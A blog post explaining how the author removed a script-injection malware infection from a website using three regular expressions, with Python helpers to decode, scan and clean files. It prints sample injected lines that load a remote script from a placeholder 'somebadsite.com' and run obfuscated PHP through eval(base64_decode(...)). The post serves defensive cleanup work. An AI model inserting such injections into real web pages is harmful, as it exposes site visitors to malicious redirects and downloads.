Cleaning Website Malware with Regular Expressions - jrowberg.io

I recently had the enjoyable task of cleaning up a website that had been infected with malware. A friend’s site had suddenly started generating that oh-so-friendly browser warning—you know, the one with the bright red background and the big message that says “Warning: Visiting this site may harm your computer!” Not only does this problem basically kill your search engine rankings, but it also undermines any confidence in your company or product. So, obviously, she wanted it cleaned as soon as possible.

Originally, since the main portion of the site is hosted through the Ning social network, I thought that a rogue user (or smart bot) had created a profile with links to malware sites, and that the profile had been around long enough for Google to pick up on it and label the site as evil. However, I should have known that Google is smarter than that. Merely having clickable links to evil sites won’t cause them to flag a site as hosting malware. Good thing, too, since that would implicate many perfectly clean blogs and forums whose comments aren’t completely moderated.

In fact, browsing to nearly any page on the site triggered the malware warning, and if you ignored that and proceeded anyway, you were redirected to one of many nefarious sites and bombarded with popups (or popup attempts, if you have a good browser). There is a non-Ning portion of this particular website as well, and it exhibited the exact same symptoms. So, I downloaded the entire website over FTP into my IDE and began looking through some of the files. It was immediately apparent that nearly every file a normal visitor might touch with their browser was infected. Something evil had access to the hosting account.

Step one, after downloading the whole site, was to change the control panel and FTP passwords. Obvious enough, and fortunately easy. But what about cleaning the 4,000+ PHP, JavaScript, and HTML files without destroying anything valuable?

Well, if you happen to have an exact original copy of the entire site, and you can clean it out and re-upload it, then I congratulate you. That’s definitely the easiest solution. But what if you don’t? What if you only have the infected version, and there is no clean master copy?

Use regular expressions, of course! (I love that comic.)

Web malware is most effective (at being evil) if the original website content remains more or less intact. That gives it at least a thin layer of legitimacy with which to fool many visitors and the less sophisticated search engines. This, in turn, means that if the malware has infected HTML files, the original HTML should still be there alongside the rogue tags. The same is true for JavaScript and PHP files. Each type of file gets its own kind of evil code, because the injected code has to be valid for the file it lands in. Obviously, throwing plain HTML into a .js file won’t do a lot of good (or bad, depending on your viewpoint).

For this particular infection involving PHP, HTML, and JS files, each evil tag looked something like this:

  • HTML:
    <script src=http://somebadsite.com/evil.js></script>
  • JavaScript:
    document.write('<script src=http://somebadsite.com/evil.js></script>');
  • PHP:
    <?php eval(base64_decode("PHNjcmlwdCBzcmViYWRzaXRlLmNvbT48L3NjcmlwdD4=")); ?>

There is a particular pattern to these, which helps us clean them out automatically. Notice the obfuscation in the PHP code, for one thing. They use base64_decode() to hide the true code. But how often does anyone legitimately use eval() and base64_decode() in their PHP code? Not often, I’d guess. Also, notice the lack of quotes around the script’s src attribute value. That’s bad form, and hopefully your code doesn’t look like that.
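
If you want to see what one of those obfuscated PHP payloads actually contains, you can decode it without ever running it. The following is a minimal Python sketch, not part of the original cleanup. The sample payload is generated inside the script from the HTML tag shown above, and the function name decode_payloads is made up for illustration.

```python
import base64
import re

# Hypothetical infected line, built here so the example is self-contained.
hidden = "<script src=http://somebadsite.com/evil.js></script>"
payload = base64.b64encode(hidden.encode("ascii")).decode("ascii")
infected = '<?php eval(base64_decode("' + payload + '")); ?>'

# Captures the quoted argument of base64_decode("...") or base64_decode('...').
ARGUMENT = re.compile(
    r"base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)",
    re.IGNORECASE,
)

def decode_payloads(source):
    """Return the decoded text of every base64_decode() string argument found."""
    decoded = []
    for match in ARGUMENT.finditer(source):
        try:
            raw = base64.b64decode(match.group(1))
        except ValueError:
            # Not valid base64 (bad padding, for example); skip it.
            continue
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded

if __name__ == "__main__":
    for text in decode_payloads(infected):
        print(text)
```

The payload is only decoded and printed as text, never evaluated, so it is safe to run against a downloaded copy of an infected file.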

Here are the regular expressions that I used to wipe out the entire infection. You need an IDE, editor, or shell script that will apply these to an entire source tree recursively. I use PhpED, but I know others will do the trick. It is a very good idea to run a find-only pass before you run a replace, in case you have legitimate code that these regexes match. Don’t just assume these will work without testing. They worked beautifully for me, though. If your site uses languages other than PHP, JS, and HTML, you may need to modify or add to these. To clean the infection, anything that matches should be replaced with nothing (i.e. deleted).

  1. /<\?php\s*eval\s*\(\s*base64_decode\s*\(.*?\)\s*\)\s*;\s*\?>/mi
  2. /document\s*\.\s*write\s*\(\s*'<script\s*src=http.*?<\\?\/script>\s*'\s*\);\s*/mi
  3. /<script\s+src=http.*?<\/script>/mi
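
For anyone scripting this instead of using an IDE, here is a rough Python translation of the three expressions above, offered as a sketch rather than the exact setup described here. The function name clean and the sample strings are illustrative assumptions. In this version the backslash before /script in the second pattern is optional, so both the escaped and the unescaped closing tag match. The patterns run in the listed order so that the document.write wrapper is removed whole before the bare script pattern can hollow it out.

```python
import re

# The /mi modifiers translate to IGNORECASE and MULTILINE in Python.
FLAGS = re.IGNORECASE | re.MULTILINE

PATTERNS = [
    # 1. PHP: <?php eval(base64_decode(...)); ?>
    re.compile(r"<\?php\s*eval\s*\(\s*base64_decode\s*\(.*?\)\s*\)\s*;\s*\?>", FLAGS),
    # 2. JS: document.write('<script src=http...</script>');
    re.compile(
        r"document\s*\.\s*write\s*\(\s*'<script\s*src=http.*?<\\?/script>\s*'\s*\);\s*",
        FLAGS,
    ),
    # 3. HTML: <script src=http...></script> with an unquoted src value
    re.compile(r"<script\s+src=http.*?</script>", FLAGS),
]

def clean(text):
    """Delete every match of the three patterns, applied in order."""
    for pattern in PATTERNS:
        text = pattern.sub("", text)
    return text

if __name__ == "__main__":
    samples = [
        "<p>Hello</p><script src=http://somebadsite.com/evil.js></script>",
        "var x = 1;\ndocument.write('<script src=http://somebadsite.com/evil.js></script>');\n",
        '<?php eval(base64_decode("PHNjcmlwdD4=")); ?>\n<?php echo "ok"; ?>',
        '<script src="https://example.com/app.js"></script>',  # quoted src, left alone
    ]
    for sample in samples:
        print(repr(clean(sample)))
```

Because none of the patterns use ^ or $, the MULTILINE flag has no practical effect; it is kept only to mirror the original modifiers.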

Pay special attention to the last one in this list, since it will remove any <script> tag that meets all three of these conditions: the src value has no quotes around it, the src attribute immediately follows the tag name, and the source is an absolute reference beginning with http. If you write your JS includes this way, then be very careful with that one. Again, try running a global find with these expressions before you run a global replace, or you very well may be sorry.
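
A find-only pass can also be scripted. The sketch below, in Python, walks a local copy of the site and reports every match with its file and line number, without writing anything. The function name find_matches, the extension list, and the site_copy directory are assumptions for illustration.

```python
import os
import re

def find_matches(root, patterns, extensions=(".php", ".js", ".html", ".htm")):
    """Yield (path, line_number, matched_text) for each hit; files are only read."""
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(folder, name)
            # errors="replace" keeps the scan going on files with odd encodings.
            with open(path, encoding="utf-8", errors="replace") as handle:
                text = handle.read()
            for pattern in patterns:
                for match in pattern.finditer(text):
                    line_number = text.count("\n", 0, match.start()) + 1
                    yield path, line_number, match.group(0)

if __name__ == "__main__":
    # Only the third (riskiest) pattern is checked here; add the others as needed.
    unquoted_script = re.compile(r"<script\s+src=http.*?</script>", re.IGNORECASE)
    # "site_copy" is a hypothetical folder holding the downloaded site.
    for path, line, text in find_matches("site_copy", [unquoted_script]):
        print(f"{path}:{line}: {text[:80]}")
```

Reviewing this report first makes it easy to spot legitimate includes that would be deleted by a replace.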

Anyway, after my IDE cleaned over 4,000 infected files with those three regexes, I re-uploaded the entire site and submitted it for review using Google’s webmaster tools. That was only last week, so the warning hasn’t been removed yet, but the site functions perfectly and there are no more attempted redirects or popups.
